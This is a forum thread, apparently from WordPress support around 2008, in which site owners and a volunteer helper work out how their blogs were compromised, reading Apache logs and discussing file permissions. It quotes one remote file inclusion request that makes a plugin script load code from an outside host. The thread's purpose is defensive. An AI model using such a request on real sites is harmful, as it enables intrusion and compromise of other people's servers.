My site was ambushed…need help figuring out how

I just discovered the same issue on my site, which is running WordPress 2.3.3. Whooami, you say that this was resolved, but I don’t see any explanations of what can be done to prevent it from happening again? The permissions on my wp-content folder are already set to 755.

So what’s the solution to this?

I have blogged about what I have done in repairing previously hacked sites on my own blog. This isnt a directory permission issue, it never has been one. People that suggest otherwise, arent aware of how the exploits are being used.

This thread was resolved because the OP contacted me privately. The underlying issue is hardly resolved because WP users with compromised sites arent taking the necessary steps to insure their sites are made secure.

1> https://www.village-idiot.org/archives/2008/03/18/wordpress-spam-inject-honeypot/

2 > https://www.village-idiot.org/archives/2008/03/19/wordpress-spam-inject-honeypot-2/

“This thread was resolved because…”

This thread is not actually resolved, since a clean install of 2.3.3 has this vulnerability as well. While changing the cookie names may indeed thwart whatever bot it is that is currently pushing out this exploit, I can promise you that it is a stopgap at best.

If your wp-content directory is still writable, fix that.

chmod 755.

That’s one of the first things I would be doing. Ive argued against plugins and settings that require that for three years.

OK, just did that, thanks.

Will the 755 permissions interfere with the plugins?

Gene

Ive offered to help set up $_POST logging for anyone that is interested in coming to more definitive conclusions regarding any of the hacked sites and their causes. For ppl that are so terribly concerned, Ive gotten few replies.

Ive contacted 10 or so admins privately about their hacked installs — no replies, the blogs remain exploited, and not surprisingly, the admins keep posting. In other words, they seemingly dont care.

The OP in this thread was contacted by a developer as well as getting help from me, and since its his thread, and his problem was solved, the thread is resolved. The rest of you are “hangers on” which aren’t adding anything meaningful to the fray, in my opinion.

Here is the offer again, if you think fresh installs of 2.3.3 are vulnerable, then set up $_POST logging and see what happens. If you need to know how to do that, contact me off list.

Secondly, Apache logs all $_GET requests, which would clearly show RFI attacks that are called like so:

archives/2006/06/29/wp-chunk//wp-content/plugins/sniplets/modules/syntax_highlight.php?variable_removed=https://americanpsycho.net/new/id.txt?

Instead of standing by and waiting for someone else to take some initiative, start looking at things, and start being proactive instead of reactive.

I will share some info on the wp-content/1 thing in an attempt to get some synapses firing.

The OP provided myself and a developer his Apache logs.

Looking inside his logs, it was clear where and when the actual actual upload of the files took place. It was also clear what file was file being used to accomplish the upload.

There were a couple things that stood out to me though.

First, there were hits to wp-login.php immediately prior to the upload. Were they successful logins from a subscriber? (the OP has only one administrator account) From a forged cookie? I don’t know, since we dont see $_POST variables in Apache logs.

Secondly, they wrote content to wp-content/index.php, and in turn that content precipitated a call to another file, which was responsible for grabbing all the uploaded content and unpacking it.

I can tell you that the calls to the WordPress file in question result in you being immediately redirected to wp-login.php

actually, after taking another look at the OP’s logs — its clear that the login was successful. There are 11 log entries, spanning three minutes, they start with a login, and end with a call to a core WP file that cannot be called unless you are logged in. In between, there are calls to the same core WP file, and one file that is created that appears responsible for the uploaded content.

One of my clients just pointed out the same problem after some investigation I found something that peeked my curiosity…

at the root of /wp-content/ was a folder named “advanced-cache.php” any attempt to open it or change the permissions would result in an FTP error. Renaming it was allowed though, but would not let me download the it. Finally after trying this and that I was able to open it using the ftp browser built into Firefox… I was able to delete this file by creating a new directory moving it there and deleting the new directory.

here are the contents:
—– BEGIN

time() ) { $meta = new CacheMeta; if (! ($meta = unserialize(@file_get_contents($meta_pathname))) ) return; foreach ($meta->headers as $header) { header($header); } $log = "\n"; if ( !($content_size = @filesize($cache_file)) > 0 || $mtime < @filemtime($cache_file)) return; if ($meta->dynamic) { include($cache_file); } else { /* No used to avoid problems with some PHP installations $content_size += strlen($log); header("Content-Length: $content_size"); */ if(!@readfile ($cache_file)) return; } echo $log; die; } $file_expired = true; // To signal this file was expired } function wp_cache_postload() { global $cache_enabled; if (!$cache_enabled) return; require(ABSPATH . 'wp-content/plugins/wp-cache/wp-cache-phase2.php'); wp_cache_phase2(); } function wp_cache_get_cookies_values() { $string = ''; while ($key = key($_COOKIE)) { if (preg_match("/^wordpress|^comment_author_email_/", $key)) { $string .= $_COOKIE[$key] . ","; } next($_COOKIE); } reset($_COOKIE); return $string; } ?>

—–

We are on WP 2.1.3 – with whole lot of plugins,
wp-content CHMODed to 755

Oops advanced-cache.php is a symlink for wp-cache, DO NOT Delete it! It will break WP.

this happened to me too, is there anyway to tell what caused it?

I believe my WP site is included in these numbers = ( of sites attacked.
I discovered the problem early yesterday morning by happenstance as I don’t go merrily tromping through my source code too often (not being a “tech guy” with the full on “tech guy know how” to fall back on I never thought it a safe thing to fool around in.)

As it stands the normal guy I ask when something tech comes up is stumped and possibly because his own WP sites aren’t effected hasn’t really looked into it as far as I am trying. So I’ve been pretty stressed out about this.

I deleted from the 2 sections in the presentation edit area I found the attack in ( header and footer php respectively) and other than furiously searching for any signs on the internet that would point to “I’ve done enough and the problem is fixed” or ” I deleted just the visible part of the problem and future danger from this cyber rape (sorry, its how I feel about it = /) is on the horizon.

Any help, info, or anything really ( even some cyber condolences lol) would be most helpful.
I’m still looking out there and I still have a few links yet to check out so wish me luck and I hope all of you affected as well have managed or are managing to contain the damage.
Thanks in advance.

I just wanted to thank whooami for helping us to sort out the same issue with our site. I probably made the problem worse by trying to fix it myself.

I’m really clueless when it comes to blogs. Whooami did a great job figuring out the problem, rapidly fixing it & suggesting ways to keep it from happening again.

Thanks Whooami!

youre welcome ??

now, that’s what I call fast!